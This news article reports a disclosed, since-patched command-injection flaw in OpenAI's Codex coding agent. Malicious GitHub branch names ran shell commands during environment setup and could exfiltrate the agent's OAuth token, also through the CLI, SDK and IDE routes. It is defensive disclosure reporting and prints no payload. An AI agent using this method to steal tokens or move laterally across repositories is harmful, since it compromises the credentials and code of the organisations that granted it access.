Phantom Labs, the research arm of identity security company BeyondTrust, has disclosed a command-injection vulnerability in OpenAI’s Codex coding agent that could expose GitHub OAuth tokens used for repository access. OpenAI has since patched the flaw with improved input validation, shell escaping, and tighter token scoping.
The vulnerability exploited the way Codex processes branch names during task creation. Codex runs automated coding tasks — code generation, reviews, pull requests — inside managed container environments that clone repositories and authenticate using short-lived GitHub OAuth tokens. By manipulating the branch name parameter, an attacker could inject arbitrary shell commands during environment setup, according to SiliconANGLE, which reported the disclosure on March 30.
How the Attack Works
The Phantom Labs researchers demonstrated that the injected commands could extract the GitHub OAuth token and expose it through task outputs or external network requests. With a stolen token, an attacker could move laterally within GitHub — particularly dangerous in enterprise environments where Codex holds broad permissions across multiple repositories and workflows.
The flaw extended beyond Codex’s web interface. Phantom Labs confirmed the attack vector also worked through the CLI, SDK, and IDE integrations, where locally stored authentication credentials could be used to reproduce the exploit via backend APIs, as SiliconANGLE reported.
More concerning: the vulnerability could scale. By embedding malicious payloads directly into GitHub branch names, an attacker with repository access could compromise multiple users interacting with the same project, turning a single poisoned branch into a multi-user attack surface.
Timing and Context
The disclosure arrives days after OpenAI shipped plugin support for Codex in version 0.117.0 on March 26, adding a searchable plugin directory, MCP server integrations, and shareable skills bundles. That expansion gives Codex access to external services including GitHub, Gmail, Google Drive, Cloudflare, and Vercel — each new integration representing an additional credential surface.
This is the pattern the agent security community has been flagging for months: every capability an AI agent gains is a potential new entry point. Codex processing branch names as unsanitized input and passing them to shell commands is a textbook case of an agent execution environment being treated as a regular application when it needs application-security-grade hardening.
“AI coding agents are not just productivity tools. They are live execution environments with access to sensitive credentials and organizational resources,” the Phantom Labs report states. “When user-controllable input is passed unsanitized into shell commands, the result is command injection with real consequences: token theft, organizational compromise and automated exploitation at scale.”
What OpenAI Fixed
OpenAI addressed the vulnerability through coordinated fixes that included improved input validation on branch name parameters, stronger shell escaping protections, tighter controls around token exposure within container environments, and additional measures to limit token scope and lifetime during task execution, according to SiliconANGLE’s reporting.
For enterprise teams running Codex with broad repository access, the fix is necessary but the underlying lesson is structural: AI agents that clone repos, authenticate to services, and execute code in containers need the same input sanitization rigor as any production application handling untrusted data. The branch name field is user-controllable. Treating it otherwise was the vulnerability.